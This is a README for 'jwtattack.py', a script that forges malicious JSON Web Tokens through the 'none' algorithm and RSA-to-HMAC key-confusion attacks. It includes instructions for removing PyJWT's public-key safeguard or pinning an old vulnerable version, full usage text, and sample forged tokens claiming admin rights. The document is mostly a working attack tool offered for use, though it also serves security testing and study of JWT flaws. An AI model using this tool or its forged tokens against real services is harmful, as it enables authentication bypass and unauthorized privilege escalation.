# jwtattack.py

## Requirements
* Python3
* PyJWT 0.4.3: `pip install pyjwt==0.4.3`

later versions don't allow public keys for symmetric signatures

Alternative: replace
  
```
invalid_strings = [
    b'-----BEGIN PUBLIC KEY-----',
    b'-----BEGIN CERTIFICATE-----',
    b'-----BEGIN RSA PUBLIC KEY-----',
    b'ssh-rsa'
]
```
  
in algorithms.py with 
  
  
```
invalid_strings = []
```


## Usage
```
$ ./jwtattack.py -h
usage: jwtattack.py [-h] [-V] [-v] [-a] [-n] [-r] [-H HEADERS [HEADERS ...]]
                    [-D DATA [DATA ...]]
                    token [PUBLIC_KEY]

This script tries to create malicious JSON Web Tokens

positional arguments:
  token                 the JWT to attack

optional arguments:
  -h, --help            show this help message and exit
  -V, --version         show program's version number and exit
  -v, --verbose         display verbose output

Attack options:
  Select attack options to generate malicious tokens

  -a, --all             generate all possible malicious tokens
  -n, --none            generate a token using the 'none' algorithm
  -r, --rsa             generate a token signed with the public key
  PUBLIC_KEY            public key for the RSA attack (alternatively stdin)
  -H HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
                        Changes to apply to the header, format key:value
  -D DATA [DATA ...], --data DATA [DATA ...]
                        Changes to apply to the data, format key:value
```

## Sample output
```
$ echo "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3WojgGHFHYLugd
UWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlvdbH6dvEOfou0/gCFQs
HUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GUnKHkkle+Q0pX/g6jXZ7r1/xAK5D
o2kQ+X5xK9cipRgEKwIDAQAB
-----END PUBLIC KEY-----" | ./jwtattack.py -a eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.TCYt5XsITJX1CxPCT8yAV-TVkIEq_PbChOMqsLfRoPsnsgw5WEuts01mq-pQy7UJiN5mgRxD-WUcX16dUEMGlv50aqzpqh4Qktb3rk-BuQy72IFLOqV0G_zS245-kronKb78cPN25DGlcTwLtjPAYuNzVBAh4vGHSrQyHUdBBPM
None: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.
RSA: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.mm69FICCR3LpghwmUJDjrwcrXlqkvgbKGiLhUp-jI5U
```